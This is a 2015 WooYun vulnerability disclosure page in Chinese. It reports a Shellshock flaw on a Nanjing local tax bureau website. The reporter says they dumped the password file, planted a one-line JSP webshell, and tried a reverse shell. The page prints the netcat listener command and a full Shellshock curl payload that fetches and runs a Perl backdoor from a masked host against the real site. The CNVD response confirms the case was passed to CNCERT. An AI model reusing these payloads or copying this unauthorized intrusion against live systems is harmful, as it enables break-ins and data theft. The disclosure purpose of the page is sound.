当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130096

漏洞标题:某地税网站信息泄露

相关厂商:某地税

漏洞作者: li3ying

提交时间:2015-07-29 12:30

修复时间:2015-09-14 17:56

公开时间:2015-09-14 17:56

漏洞类型:成功的入侵事件

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-29: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

好怕怕,警察叔叔会查水表吗?我是自首的!

详细说明:

偶然的机会看到了南京地税的网站,
http://www.njds.gov.cn/cgi-bin/test-cgi
发现存在bash漏洞;如下:

1.png


就鲁一把;远程测试下是否真的存在;,我塞,用户密码文件直接掳出来了;

2.png


继续看;直接把路径也搞出来了;

3.png


剩下就是直接反弹后门了;
好,有了路径,那就写一句木马吧;试下;如下图所示,首先写入一句话jsp木马;然后查看是否成功写入文件;发现成功写入;

4.png


下面就是用菜刀的机会了;郁闷了,菜刀就是无法反弹和列目录;怀疑是目录问题,可以重试几次应该就OK了,但还是怕警察叔叔查水表,我去洗洗睡了;这个洞就到这吧,就不拿主机权限了;原想拿到主机权限,然后进行提权;
另外一个思路,直接反弹shell;
本身已在个人电脑上,开启了监听;
nc -lvp 2344;
然后执行如下反弹命令,未成功,想想还是提个洞吧,不深入挖了,
curl -A '() { :; }; cd /tmp;wget http://x.x.x.x/back.pl;chmod +x back.pl; ./tmp/back.pl x.x.x.x 2344;' http://www.njds.gov.cn/cgi-bin/test-cgi

漏洞证明:

如上已证明;

修复方案:

修复这个漏洞;

版权声明:转载请注明来源 li3ying@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-31 17:55

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无